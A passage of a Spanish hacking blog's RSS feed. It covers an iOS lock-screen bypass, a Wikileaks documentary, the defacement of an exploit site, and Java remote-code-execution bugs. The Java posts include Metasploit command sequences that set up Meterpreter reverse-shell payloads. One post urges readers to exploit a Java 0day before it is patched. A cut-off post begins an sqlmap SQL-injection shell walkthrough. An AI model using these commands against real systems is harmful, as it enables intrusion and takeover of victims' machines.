Bueno, nunca está demás saberse este truco para por ejemplo encontrar al dueño de algún iPhone perdido, o para simplemente jugar alguna broma.&lt;/div&gt;
&lt;br /&gt;

&lt;b&gt;Fuente:&lt;/b&gt; &lt;a href="http://www.theverge.com/2013/2/14/3987830/ios-6-1-security-flaw-lets-anyone-make-calls-from-your-iphone" target="_blank"&gt;http://www.theverge.com/&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Vía:&lt;/b&gt; &lt;a href="http://www.cyberhades.com/2013/02/14/saltando-la-pantalla-de-bloqueo-en-ios-6-1/" target="_blank"&gt;http://www.cyberhades.com/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/yb_I7W1NwJ8" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-02-19T19:54:17.108-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-hOL67aDoPiw/USQANaJDjBI/AAAAAAAAB10/OgdsnoNswLA/s72-c/iOS+6.1+lockscreen+bypass.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/02/saltandose-la-contrasena-de-un-ios-61.html</feedburner:origLink></item><item><title>WikiRebels - Wikileaks: Con la Filtración como Arma (Documental Subtitulado)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/ImUC9LbITeY/wikirebels-wikileaks-con-la-filtracion.html</link><category>WikiRebels</category><category>Video</category><category>Wikileaks</category><category>Documental</category><category>Seguridad Web</category><category>Noticias</category><category>Seguridad</category><category>Leaks</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Fri, 22 Feb 2013 12:21:09 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-4096354660942316182</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://4.bp.blogspot.com/-P5HOi8pUkZ4/UQbbFa1g0SI/AAAAAAAABzw/5VoQriYaQXU/s1600/wikirebels_wikileaks_documental.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-P5HOi8pUkZ4/UQbbFa1g0SI/AAAAAAAABzw/5VoQriYaQXU/s320/wikirebels_wikileaks_documental.jpg" width="224" /&gt;&lt;/a&gt;En menos de un año &lt;b&gt;Wikileaks &lt;/b&gt;ha pasado de ser un sitio web en lugar oscuro a un actor político global, dando forma a la historia del mundo y los acontecimientos, al revelar documentos secretos sobre &lt;b&gt;crímenes de guerra&lt;/b&gt;, la &lt;b&gt;corrupción corporativa&lt;/b&gt; y las &lt;b&gt;sombras de las relaciones políticas internacionales&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Los reporteros &lt;b&gt;Jesper Huor&lt;/b&gt; y &lt;b&gt;Bosse Lindquist&lt;/b&gt; de la televisión sueca ha viajado a varios países para conocer al personal de Wikileaks. Se han hecho varias entrevistas en profundidad con su enigmático editor jefe, Assange Julián, a quien algunos ven como un defensor de la libertad, otros como un espía y violador. Pero también se han reunido varias personas clave detrás de Wikileaks - los geeks y los periodistas. Además de los opositores Wikileaks.&lt;br /&gt;
&lt;br /&gt;
Hoy, después del alto perfil de seriedad de varias filtraciones acerca de los Estados Unidos, Wikileaks es una organización en peligro. EE.UU. aumenta la presión y la rebelión ha llevado al nacimiento de otra plataforma para las filtraciones, con sede en Alemania, Openleaks. &lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;
Wikileaks se está convirtiendo en una organización de peso. Hasta el primer ministro israelí, &lt;b&gt;Binyamin Netanyahu&lt;/b&gt;, ha afirmado que los documentos dan la razón a su Gobierno en la valoración de la amenaza iraní.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe width="728" height="410" src="http://www.youtube.com/embed/69NSfF5qm3E" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;/div&gt;

Click en el primer icono para activar subtítulos en español.
&lt;a href="http://2.bp.blogspot.com/-n7jpyxkPF1Q/UQbcSt7vk1I/AAAAAAAAB00/zPy6c-YcON0/s1600/subtitulos%2Byoutube.bmp" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-n7jpyxkPF1Q/UQbcSt7vk1I/AAAAAAAAB00/zPy6c-YcON0/s320/subtitulos%2Byoutube.bmp" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Investigación:&lt;/b&gt; Päivi Suhonen , Johannes Wahlström, Armin Turkanovic&lt;br /&gt;
&lt;b&gt;Productores:&lt;/b&gt; Bosse Lindquist, Huor Jesper&lt;br /&gt;
&lt;b&gt;Fotografía:&lt;/b&gt; Lars Granstrand, Sven Lindahl&lt;br /&gt;
&lt;b&gt;Montaje:&lt;/b&gt; Michael Hallberg&lt;br /&gt;
&lt;b&gt;Jefe de proyecto:&lt;/b&gt; Johan Branstad&lt;br /&gt;
&lt;b&gt;Producción:&lt;/b&gt; SVT&lt;br /&gt;
&lt;b&gt;País de producción:&lt;/b&gt; Suecia&lt;br /&gt;
&lt;b&gt;Año:&lt;/b&gt; 2010&lt;br /&gt;
&lt;b&gt;Duración:&lt;/b&gt; 57 min.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Fuente:&lt;/b&gt; &lt;a href="http://www.naranjasdehiroshima.com/" target="_blank"&gt;http://www.naranjasdehiroshima.com/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/ImUC9LbITeY" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-02-22T17:21:09.167-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-P5HOi8pUkZ4/UQbbFa1g0SI/AAAAAAAABzw/5VoQriYaQXU/s72-c/wikirebels_wikileaks_documental.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/01/wikirebels-wikileaks-con-la-filtracion.html</feedburner:origLink></item><item><title>Inj3ct0r (1337day) Hackeado por Injector &amp; Sec4ever Team</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/7KeCtxPun20/inj3ct0r-1337day-hackeado-por-injector.html</link><category>Inj3ct0r</category><category>Hacked</category><category>Noticias</category><category>1337day</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Mon, 28 Jan 2013 11:45:49 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-4116525288629244155</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-0S3-xhS72xk/UQbT1eS3ibI/AAAAAAAABx0/iB4AHKW0I3M/s1600/inj3ct0r+hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-7b6DmJHgJv0/UQbT3X9aQSI/AAAAAAAABx8/rnpf2tUnWSQ/s1600/inj3ct0r+hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="256" src="http://1.bp.blogspot.com/-7b6DmJHgJv0/UQbT3X9aQSI/AAAAAAAABx8/rnpf2tUnWSQ/s640/inj3ct0r+hacked.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Hace un tiempo atrás &lt;b&gt;Inj3ct0r (1337day)&lt;/b&gt; había &lt;a href="http://www.blackploit.com/2012/12/inj3ct0r-team-hackea-exploithub-y-roba.html#.UQbSDsgmZ8E" target="_blank"&gt;hackeado a &lt;b&gt;ExploitHub&lt;/b&gt;&amp;nbsp; y había robado la base de datos con más de 200 exploits Privados&lt;/a&gt; que comercializaban, poniéndolos en breve en su propia web. Al parecer Inj3ct0r ha recibido un poco de su propia medicina y ha sido "hackeado" por el grupo &lt;b&gt;Injector &amp;amp; Sec4ever&lt;/b&gt;.&amp;nbsp;&lt;/div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-50ImIAlKZr4/UQbTFuwL3VI/AAAAAAAABxo/RZY9mOhKtwk/s1600/1337day+Pwned!.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="530" src="http://2.bp.blogspot.com/-50ImIAlKZr4/UQbTFuwL3VI/AAAAAAAABxo/RZY9mOhKtwk/s640/1337day+Pwned!.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br /&gt;
&lt;div style="float:right; margin:5px;"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 250 x 250 */
google_ad_slot = "9258007445";
google_ad_width = 250;
google_ad_height = 250;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Al parecer es un simple cambio en el DNS, ya que los dominios &lt;a href="http://1337day.org/"&gt;&lt;b&gt;1337day.org&lt;/b&gt;&lt;/a&gt; y &lt;a href="http://1337day.net/"&gt;&lt;b&gt;1337day.net&lt;/b&gt;&lt;/a&gt; nos dirigen a un index alojado en &lt;a href="http://hosting24.com/"&gt;hosting24.com&lt;/a&gt; hosting gratuito y que no tiene relación alguna con los servidores de Inj3ct0r.
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por el momento es difícil informar más ya que ninguno de los 2 "Teams" se ha pronunciado hasta el momento, más allá del index que dejaron  los atacantes, &lt;b&gt;Injector &amp;amp; Sec4ever&lt;/b&gt;. De existir un compromiso serio, se podrían filtran varios exploits privados que guarda Inj3ct0r y liberar los que se venden, es todo especulación por el momento.
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Salu2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Zion3R&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/7KeCtxPun20" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-28T16:45:49.550-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-7b6DmJHgJv0/UQbT3X9aQSI/AAAAAAAABx8/rnpf2tUnWSQ/s72-c/inj3ct0r+hacked.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/01/inj3ct0r-1337day-hackeado-por-injector.html</feedburner:origLink></item><item><title>2 Graves vulnerabilidades en Java permite Ejecución de Código Remoto, Java Applet AverageRangeStatisticImpl &amp; Method Handle (Videos MSF)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/rXpOPZugILI/2-graves-vulnerabilidades-en-java.html</link><category>Video</category><category>Bug</category><category>Seguridad Web</category><category>Metasploit</category><category>Exploit</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Wed, 23 Jan 2013 19:46:07 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2758238643710364959</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-BpnHevrfa70/UQCnR_0iKqI/AAAAAAAABvo/4N66P8egqIw/s1600/Java+Precuacion.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-BpnHevrfa70/UQCnR_0iKqI/AAAAAAAABvo/4N66P8egqIw/s200/Java+Precuacion.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace muy poco que se había descubierto un &lt;b&gt;&lt;a href="http://www.blackploit.com/2013/01/grave-0day-en-java-permite-ejecucion-de.html" target="_blank"&gt;Grave 0day en Java&lt;/a&gt;&lt;/b&gt; que permitía a un atacante tomar el control de un sistema, esto trajo muchos inconvenientes tanto por parte de Oracle como de los usuarios de Java, llego el punto en que se recomendó por parte del gobierno de EE.UU a desactivar Java o simplemente eliminarlo por los potenciales perjuicios a los sistemas con Java corriendo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Otro problema fue la tardanza de un parche oficial por parte de Java, pero tan rápido como salió el parche arreglando el 0day, aparecieron voces diciendo que no estaba bien parchado y que aun era posible explotar el bug. A todos estos inconvenientes sumemosle el hecho de que se empezaron a comercializar por internet 2 nuevas vulnerabilidades en Java...&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;br /&gt;

&lt;div style="text-align: justify;"&gt;
Recientemente (01-22-2013) Metasploit proporcionado los módulos que explotan estos 2 bugs, y aquí los dejo con las especificaciones y los videos de explotación con Metasploit:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;CVE-2012-5076 Java Applet AverageRangeStatisticImpl:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Este módulo abusa de AverageRangeStatisticImpl a partir de un Applet de Java para ejecutar código arbitrario fuera del sandbox de Java, este es otro vector de ataque descubierto y parchado en noviembre de 2012, pero que renace de las cenizas. Las versiones de Java afectadas son Oracle Java version 7 Update 7 y anteriores.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;center&gt;&lt;iframe width="640" height="360" src="http://www.youtube.com/embed/5Mb-aa2RoOE" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;pre&gt;&lt;code&gt;use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo&lt;/code&gt;&lt;/pre&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;CVE-2012-5088 Java Applet Method Handle:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Este módulo es parecido al anterior, pero abusa de Method Handle class a partir de un Applet de Java para ejecutar código arbitrario fuera del sandbox de Java. Las versiones de Java afectadas son Oracle Java version 7 Update 7 y anteriores.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;

&lt;center&gt;&lt;iframe width="640" height="360" src="http://www.youtube.com/embed/w5uICFvdudE" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;pre&gt;&lt;code&gt;use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo&lt;/code&gt;&lt;/pre&gt;

&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Al actualizar Metasploit los módulos se agregaran automáticamente, igualmente les dejo los módulos:&lt;/div&gt;
&lt;ul style="text-align: justify;"&gt;
&lt;li&gt;&lt;a href="http://packetstormsecurity.com/files/119721/java_jre17_method_handle.rb.txt" target="_blank"&gt;Java Applet Method Handle Remote Code Execution &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://packetstormsecurity.com/files/119723/java_jre17_glassfish_averagerangestatisticimpl.rb.txt" target="_blank"&gt;Java Applet AverageRangeStatisticImpl Remote Code Execution&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Videos:&lt;/b&gt;&lt;/div&gt;
&lt;ul style="text-align: justify;"&gt;
&lt;li&gt;&lt;a href="http://eromang.zataz.com/2013/01/23/cve-2012-5076-java-applet-averagerangestatisticimpl-rce-metasploit-demo/" target="_blank"&gt;CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://eromang.zataz.com/2013/01/23/cve-2012-5088-java-applet-method-handle-rce-metasploit-demo/" target="_blank"&gt;CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;b&gt;Más Información: &lt;/b&gt;&lt;a href="https://community.rapid7.com/community/metasploit/blog/2013/01/22/new-java-modules-in-metasploit-no-0-days-this-time"&gt;https://community.rapid7.com/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/rXpOPZugILI" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-24T00:46:07.650-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-BpnHevrfa70/UQCnR_0iKqI/AAAAAAAABvo/4N66P8egqIw/s72-c/Java+Precuacion.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/01/2-graves-vulnerabilidades-en-java.html</feedburner:origLink></item><item><title>Grave 0day en Java permite Ejecución de Código Remoto (Video MSF)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/hTh9Vbl0_tc/grave-0day-en-java-permite-ejecucion-de.html</link><category>Video</category><category>Bug</category><category>Seguridad Web</category><category>Metasploit</category><category>Exploit</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Fri, 11 Jan 2013 07:25:17 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-943207159506738207</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-oSosc52P4qE/UO9t8py9WhI/AAAAAAAABuo/vjV0F5gafFY/s1600/java-oday.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="164" src="http://2.bp.blogspot.com/-oSosc52P4qE/UO9t8py9WhI/AAAAAAAABuo/vjV0F5gafFY/s200/java-oday.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Recientemente (PoC proporcionado el 10/01/2013) se ha detectado un &lt;strike&gt;(muy)&lt;/strike&gt; grave 0day en &lt;b&gt;Oracle Java SE 7 Update 10&lt;/b&gt;, que es la última versión disponible de Java. Lo que lo hace muy peligroso para todos los usuarios de Windows, Linux y Mac, ya que no existe parche alguno que arregle esta vulnerabilidad.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El alcance de esta vulnerabilidad es crítica ya que la mayoría (por no decir todos) de los computadores tienen instalado Java por los beneficios que nos proporciona. Lo que lo transforma en un 0day muy peligroso y muy codiciado por los potenciales atacantes, es más, en estos momentos ya se está usando para fines malicioso, por lo demás, pronto será parchado y si quieren sacarle provecho más vale que lo hagan pronto.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
La solución óptima en estos momentos es &lt;b&gt;desactivar Java&lt;/b&gt; hasta que Oracle proporcione una actualización con el correspondiente parche que arregle este 0day.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como siempre Metasploit ha hecho su trabajo y ya se dispone de un módulo que lo explota, así que aquí les dejo con un video de explotación con Metasploit:&lt;/div&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe width="640" height="360" src="http://www.youtube.com/embed/r3LnsCl8qQs" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;b&gt;Video:&lt;/b&gt; &lt;a href="http://eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/" target="_blank"&gt;http://eromang.zataz.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Más Info:&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422" target="_blank"&gt;http://www.cve.mitre.org/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://osvdb.org/" target="_blank"&gt;http://osvdb.org/89059&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html" target="_blank"&gt;http://malware.dontneedcoffee.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/hTh9Vbl0_tc" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-11T12:25:17.509-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-oSosc52P4qE/UO9t8py9WhI/AAAAAAAABuo/vjV0F5gafFY/s72-c/java-oday.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/01/grave-0day-en-java-permite-ejecucion-de.html</feedburner:origLink></item><item><title>Conseguir Shell por SQLi con SQLMap</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/SCifCwdzZX0/conseguir-shell-desde-un-sqli-con-sqlmap.html</link><category>SQLMap</category><category>Bug</category><category>Seguridad Web</category><category>Hack Tips</category><category>SQLi</category><category>Seguridad</category><author>noreply@blogger.com (Caleb Bucker)</author><pubDate>Thu, 10 Jan 2013 17:09:41 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-8261247240283779090</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i48.tinypic.com/2466wqc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i48.tinypic.com/2466wqc.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
Hace algunos días auditando un Servidor Web (universidad) basada en Apache 1.3.26, PHP 4.2.1 a un cliente, me tope con la típica vulnerabilidad de Inyección de Código Sql, la cual permite fácilmente obtener toda la base de datos del servidor, entonces de inmediato empece a inyectar manualmente pero para mi suerte!!! ninguna de las inyecciones y bypasses dio resultado, entonces me pregunte ¿Por que? si es una vulnerabilidad peligrosa y fácilmente explotable, pero luego analizando nuevamente di con el resultado que era un simple FP (falso positivo).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Después de terminar el nuevo análisis &amp;nbsp;encontré otra vulnerabilidad de Inyección de Código Sql, mostrándome el famoso error:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: Courier New, Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: lime; font-family: Courier New, Courier, monospace;"&gt;You have an error in your SQL syntax near '' order by gal_id desc limit 5' at line 1&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
Entonces basándome en el resultado anterior del FP, decidí utilizar la famosa herramienta SQLMap para comprobar si realmente el sitio era vulnerable a esta inyección &amp;nbsp;para ello use el comando mas simple pero muchas veces eficiente que cuenta SQLMap:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --dbs&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Pero para mi mayor suerte! la herramienta devolvió el siguiente resultado:&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i50.tinypic.com/2dqrrzr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i50.tinypic.com/2dqrrzr.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div&gt;
